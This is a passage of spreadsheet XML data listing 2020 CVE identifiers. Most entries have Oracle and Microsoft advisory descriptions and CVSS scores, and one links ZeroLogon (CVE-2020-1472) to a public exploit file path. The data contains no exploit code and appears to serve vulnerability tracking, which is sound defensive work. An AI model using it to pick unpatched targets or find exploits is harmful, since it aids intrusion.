    <t>Vulnerability in the Oracle BI Publisher product of Oracle Fusion Middleware (component: Layout Templates). Supported versions that are affected are 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle BI Publisher. While the vulnerability is in Oracle BI Publisher, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle BI Publisher accessible data as well as unauthorized read access to a subset of Oracle BI Publisher accessible data. CVSS 3.1 Base Score 7.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14697</t>
  </si>
  <si>
    <t>CVE-2020-14698</t>
  </si>
  <si>
    <t>CVE-2020-14699</t>
  </si>
  <si>
    <t>CVE-2020-1470</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Work Folders Service improperly handles memory.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka 'Windows Work Folders Service Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1484, CVE-2020-1516.</t>
  </si>
  <si>
    <t>CVE-2020-14700</t>
  </si>
  <si>
    <t>CVE-2020-14701</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle SD-WAN Aware product of Oracle Communications Applications (component: User Interface). The supported version that is affected is 8.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle SD-WAN Aware. While the vulnerability is in Oracle SD-WAN Aware, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Oracle SD-WAN Aware. CVSS 3.1 Base Score 10.0 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H).</t>
  </si>
  <si>
    <t>CVE-2020-14702</t>
  </si>
  <si>
    <t>CVE-2020-14703</t>
  </si>
  <si>
    <t>CVE-2020-14704</t>
  </si>
  <si>
    <t>CVE-2020-14705</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle GoldenGate product of Oracle GoldenGate (component: Process Management). The supported version that is affected is Prior to 19.1.0.0.0. Easily exploitable vulnerability allows unauthenticated attacker with access to the physical communication segment attached to the hardware where the Oracle GoldenGate executes to compromise Oracle GoldenGate. While the vulnerability is in Oracle GoldenGate, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Oracle GoldenGate. CVSS 3.1 Base Score 9.6 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H).</t>
  </si>
  <si>
    <t>CVE-2020-14706</t>
  </si>
  <si>
    <t>Vulnerability in the Primavera P6 Enterprise Project Portfolio Management product of Oracle Construction and Engineering (component: Web Access). Supported versions that are affected are 17.1.0.0-17.12.17.1, 18.1.0.0-18.8.19 and 19.12.0-19.12.5. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Primavera P6 Enterprise Project Portfolio Management. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Primavera P6 Enterprise Project Portfolio Management accessible data as well as unauthorized update, insert or delete access to some of Primavera P6 Enterprise Project Portfolio Management accessible data. CVSS 3.1 Base Score 5.9 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14707</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are Prior to 5.2.44, prior to 6.0.24 and prior to 6.1.12. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle VM VirtualBox. CVSS 3.1 Base Score 5.0 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H).</t>
  </si>
  <si>
    <t>CVE-2020-14708</t>
  </si>
  <si>
    <t>Vulnerability in the Customer Management and Segmentation Foundation product of Oracle Retail Applications (component: Segment). Supported versions that are affected are 16.0, 17.0 and 18.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Customer Management and Segmentation Foundation. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Customer Management and Segmentation Foundation accessible data. CVSS 3.1 Base Score 4.3 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14709</t>
  </si>
  <si>
    <t>Vulnerability in the Customer Management and Segmentation Foundation product of Oracle Retail Applications (component: Card). Supported versions that are affected are 16.0, 17.0 and 18.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Customer Management and Segmentation Foundation. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Customer Management and Segmentation Foundation accessible data as well as unauthorized read access to a subset of Customer Management and Segmentation Foundation accessible data. CVSS 3.1 Base Score 7.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-1471</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when Microsoft Windows CloudExperienceHost fails to check COM objects, aka 'Windows CloudExperienceHost Elevation of Privilege Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-14710</t>
  </si>
  <si>
    <t>Vulnerability in the Customer Management and Segmentation Foundation product of Oracle Retail Applications (component: Security). Supported versions that are affected are 16.0, 17.0 and 18.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Customer Management and Segmentation Foundation. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Customer Management and Segmentation Foundation accessible data as well as unauthorized read access to a subset of Customer Management and Segmentation Foundation accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14711</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are Prior to 5.2.44, prior to 6.0.24 and prior to 6.1.12. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. Note: The CVE-2020-14711 is applicable to macOS host only. CVSS 3.1 Base Score 6.5 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H).</t>
  </si>
  <si>
    <t>CVE-2020-14712</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are Prior to 5.2.44, prior to 6.0.24 and prior to 6.1.12. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle VM VirtualBox accessible data. CVSS 3.1 Base Score 5.0 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14713</t>
  </si>
  <si>
    <t>CVE-2020-14714</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are Prior to 5.2.44, prior to 6.0.24 and prior to 6.1.12. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle VM VirtualBox. CVSS 3.1 Base Score 4.4 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).</t>
  </si>
  <si>
    <t>CVE-2020-14715</t>
  </si>
  <si>
    <t>CVE-2020-14716</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Common Applications product of Oracle E-Business Suite (component: CRM User Management Framework). Supported versions that are affected are 12.1.3 and 12.2.3-12.2.9. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Common Applications. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Common Applications, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Common Applications accessible data. CVSS 3.1 Base Score 4.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14717</t>
  </si>
  <si>
    <t>CVE-2020-14718</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle GraalVM Enterprise Edition product of Oracle GraalVM (component: JVMCI). Supported versions that are affected are 19.3.2 and 20.1.0. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in takeover of Oracle GraalVM Enterprise Edition. CVSS 3.1 Base Score 7.2 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H).</t>
  </si>
  <si>
    <t>CVE-2020-14719</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Internet Expenses product of Oracle E-Business Suite (component: Mobile Expenses Admin Utilities). Supported versions that are affected are 12.2.4-12.2.9. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Internet Expenses. While the vulnerability is in Oracle Internet Expenses, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Internet Expenses accessible data. CVSS 3.1 Base Score 7.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-1472</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when an attacker establishes a vulnerable Netlogon secure channel connection to a domain controller, using the Netlogon Remote Protocol (MS-NRPC), aka 'Netlogon Elevation of Privilege Vulnerability'.</t>
  </si>
  <si>
    <t>exploits/windows/remote/49071.py</t>
  </si>
  <si>
    <t>ZeroLogon - Netlogon Elevation of Privilege</t>
  </si>
  <si>
    <t>CVE-2020-14720</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Internet Expenses product of Oracle E-Business Suite (component: Mobile Expenses Admin Utilities). Supported versions that are affected are 12.2.4-12.2.9. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Internet Expenses. While the vulnerability is in Oracle Internet Expenses, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Internet Expenses accessible data. CVSS 3.1 Base Score 7.7 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14721</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Enterprise Communications Broker product of Oracle Communications Applications (component: WebGUI). Supported versions that are affected are 3.0.0-3.2.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Enterprise Communications Broker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Enterprise Communications Broker accessible data as well as unauthorized read access to a subset of Oracle Enterprise Communications Broker accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Enterprise Communications Broker. CVSS 3.1 Base Score 6.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L).</t>
  </si>
  <si>
    <t>CVE-2020-14722</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Enterprise Communications Broker product of Oracle Communications Applications (component: WebGUI). Supported versions that are affected are 3.0.0-3.2.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Enterprise Communications Broker. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Enterprise Communications Broker, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Enterprise Communications Broker accessible data as well as unauthorized read access to a subset of Oracle Enterprise Communications Broker accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Enterprise Communications Broker. CVSS 3.1 Base Score 5.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:L).</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:L</t>
  </si>
  <si>
    <t>CVE-2020-14723</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Help Technologies product of Oracle Fusion Middleware (component: Web UIX). Supported versions that are affected are 11.1.1.9.0 and 12.2.1.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Help Technologies. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Help Technologies, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Help Technologies accessible data as well as unauthorized update, insert or delete access to some of Oracle Help Technologies accessible data. CVSS 3.1 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14724</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Solaris product of Oracle Systems (component: Device Driver Utility). The supported version that is affected is 11. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle Solaris executes to compromise Oracle Solaris. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in takeover of Oracle Solaris. CVSS 3.1 Base Score 7.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H).</t>
  </si>
  <si>
    <t>CVE-2020-14725</t>
  </si>
  <si>
    <t>CVE-2020-14728</t>
  </si>
  <si>
    <t>Vulnerability in the SuiteCommerce Advanced (SCA) component of Oracle NetSuite service. Supported versions that are affected are Montblanc, Vinson, Elbrus, Kilimanjaro, Aconcagua, 2018.2, 2019.1, 2019.2. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise NetSuite SCA. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in NetSuite SCA, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of NetSuite SCA accessible data as well as unauthorized read access to a subset of NetSuite SCA data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14729</t>
  </si>
  <si>
    <t>Vulnerability in SuiteCommerce Advanced (SCA) Sites component of Oracle NetSuite service. Supported versions that are affected are prior to 2020.1.4. Difficult to exploit vulnerability allows low privileged attacker with network access via HTTP to compromise NetSuite SCA. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all NetSuite SCA accessible data as well as unauthorized read access to a subset of NetSuite SCA data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:H/A:N).</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:H/A:N</t>
  </si>
  <si>
    <t>CVE-2020-1473</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory, aka 'Jet Database Engine Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1557, CVE-2020-1558, CVE-2020-1564.</t>
  </si>
  <si>
    <t>CVE-2020-14731</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Retail Customer Management and Segmentation Foundation product of Oracle Retail Applications (component: Segment). Supported versions that are affected are 18.0 and 19.0. Difficult to exploit vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Retail Customer Management and Segmentation Foundation. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Retail Customer Management and Segmentation Foundation accessible data. CVSS 3.1 Base Score 3.1 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14732</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Retail Customer Management and Segmentation Foundation product of Oracle Retail Applications (component: Promotions). The supported version that is affected is 19.0. Difficult to exploit vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Retail Customer Management and Segmentation Foundation. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Retail Customer Management and Segmentation Foundation accessible data. CVSS 3.1 Base Score 3.1 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14734</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Text component of Oracle Database Server. Supported versions that are affected are 11.2.0.4, 12.1.0.2, 12.2.0.1, 18c and 19c. Difficult to exploit vulnerability allows unauthenticated attacker with network access via Oracle Net to compromise Oracle Text. Successful attacks of this vulnerability can result in takeover of Oracle Text. CVSS 3.1 Base Score 8.1 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H).</t>
  </si>
  <si>
    <t>CVE-2020-14735</t>
  </si>
  <si>
    <t>Vulnerability in the Scheduler component of Oracle Database Server. Supported versions that are affected are 11.2.0.4, 12.1.0.2, 12.2.0.1, 18c and 19c. Easily exploitable vulnerability allows low privileged attacker having Local Logon privilege with logon to the infrastructure where Scheduler executes to compromise Scheduler. While the vulnerability is in Scheduler, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Scheduler. CVSS 3.1 Base Score 8.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H).</t>
  </si>
  <si>
    <t>CVE-2020-14736</t>
  </si>
  <si>
    <t>Vulnerability in the Database Vault component of Oracle Database Server. Supported versions that are affected are 11.2.0.4, 12.1.0.2 and 12.2.0.1. Easily exploitable vulnerability allows high privileged attacker having Create Public Synonym privilege with network access via Oracle Net to compromise Database Vault. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Database Vault accessible data as well as unauthorized read access to a subset of Database Vault accessible data. CVSS 3.1 Base Score 3.8 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-1474</t>
  </si>
  <si>
    <t>An information disclosure vulnerability exists when the Windows Image Acquisition (WIA) Service improperly discloses contents of its memory, aka 'Windows Image Acquisition Service Information Disclosure Vulnerability'. This CVE ID is unique from CVE-2020-1485.</t>
  </si>
  <si>
    <t>CVE-2020-14740</t>
  </si>
  <si>
    <t>Vulnerability in the SQL Developer Install component of Oracle Database Server. Supported versions that are affected are 11.2.0.4, 12.1.0.2, 12.2.0.1 and 18c. Easily exploitable vulnerability allows low privileged attacker having Client Computer User Account privilege with logon to the infrastructure where SQL Developer Install executes to compromise SQL Developer Install. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized read access to a subset of SQL Developer Install accessible data. CVSS 3.1 Base Score 2.8 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14741</t>
  </si>
  <si>
    <t>Vulnerability in the Database Filesystem component of Oracle Database Server. Supported versions that are affected are 11.2.0.4, 12.1.0.2 and 12.2.0.1. Easily exploitable vulnerability allows high privileged attacker having Resource, Create Table, Create View, Create Procedure, Dbfs_role privilege with network access via Oracle Net to compromise Database Filesystem. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Database Filesystem. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).</t>
  </si>
  <si>
    <t>CVE-2020-14742</t>
  </si>
  <si>
    <t>Vulnerability in the Core RDBMS component of Oracle Database Server. Supported versions that are affected are 11.2.0.4, 12.1.0.2, 12.2.0.1, 18c and 19c. Easily exploitable vulnerability allows high privileged attacker having SYSDBA level account privilege with network access via Oracle Net to compromise Core RDBMS. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Core RDBMS accessible data. CVSS 3.1 Base Score 2.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14743</t>
  </si>
  <si>
    <t>Vulnerability in the Java VM component of Oracle Database Server. Supported versions that are affected are 11.2.0.4, 12.1.0.2, 12.2.0.1, 18c and 19c. Difficult to exploit vulnerability allows low privileged attacker having Create Procedure privilege with network access via multiple protocols to compromise Java VM. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java VM accessible data. CVSS 3.1 Base Score 3.1 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14744</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle REST Data Services product of Oracle REST Data Services (component: General). Supported versions that are affected are 11.2.0.4, 12.1.0.2, 12.2.0.1, 18c and 19c; Standalone ORDS: prior to 20.2.1. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle REST Data Services. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle REST Data Services accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14745</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle REST Data Services product of Oracle REST Data Services (component: General). Supported versions that are affected are 11.2.0.4, 12.1.0.2, 12.2.0.1, 18c and 19c; Standalone ORDS: prior to 20.2.1. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle REST Data Services. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle REST Data Services accessible data. CVSS 3.1 Base Score 4.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14746</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Applications Framework product of Oracle E-Business Suite (component: Popup windows). Supported versions that are affected are 12.1.3 and 12.2.3 - 12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Applications Framework. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Applications Framework, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Applications Framework accessible data. CVSS 3.1 Base Score 4.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-1475</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in the way that the srmsvc.dll handles objects in memory, aka 'Windows Server Resource Management Service Elevation of Privilege Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-14750</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).</t>
  </si>
  <si>
    <t>CVE-2020-14752</t>
  </si>
  <si>
    <t>Vulnerability in the Hyperion Lifecycle Management product of Oracle Hyperion (component: Shared Services). The supported version that is affected is 11.1.2.4. Difficult to exploit vulnerability allows high privileged attacker with network access via HTTP to compromise Hyperion Lifecycle Management. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Hyperion Lifecycle Management accessible data. CVSS 3.1 Base Score 4.2 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:N/I:H/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14753</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Hospitality Reporting and Analytics product of Oracle Food and Beverage Applications (component: Installation). The supported version that is affected is 9.1.0. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle Hospitality Reporting and Analytics executes to compromise Oracle Hospitality Reporting and Analytics. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Hospitality Reporting and Analytics, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Hospitality Reporting and Analytics accessible data. CVSS 3.1 Base Score 5.9 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:N/A:N).</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:N/A:N</t>
  </si>
  <si>
    <t>CVE-2020-14754</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Solaris product of Oracle Systems (component: Filesystem). The supported version that is affected is 11. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle Solaris executes to compromise Oracle Solaris. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle Solaris. CVSS 3.1 Base Score 5.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).</t>
  </si>
  <si>
    <t>CVE-2020-14756</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Coherence product of Oracle Fusion Middleware (component: Core Components). Supported versions that are affected are 3.7.1.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via IIOP, T3 to compromise Oracle Coherence. Successful attacks of this vulnerability can result in takeover of Oracle Coherence. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).</t>
  </si>
  <si>
    <t>CVE-2020-14757</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Web Services). The supported version that is affected is 12.2.1.3.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle WebLogic Server accessible data as well as unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. CVSS 3.1 Base Score 6.8 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N).</t>
  </si>
  <si>
    <t>CVE-2020-14758</t>
  </si>
  <si>
    <t>Vulnerability in the Oracle Solaris product of Oracle Systems (component: Kernel). The supported version that is affected is 11. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle Solaris executes to compromise Oracle Solaris. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Solaris accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Solaris. CVSS 3.1 Base Score 5.6 (Confidentiality and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:L).</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:L</t>
  </si>
  <si>
    <t>CVE-2020-14759</t>
  </si>
  <si>
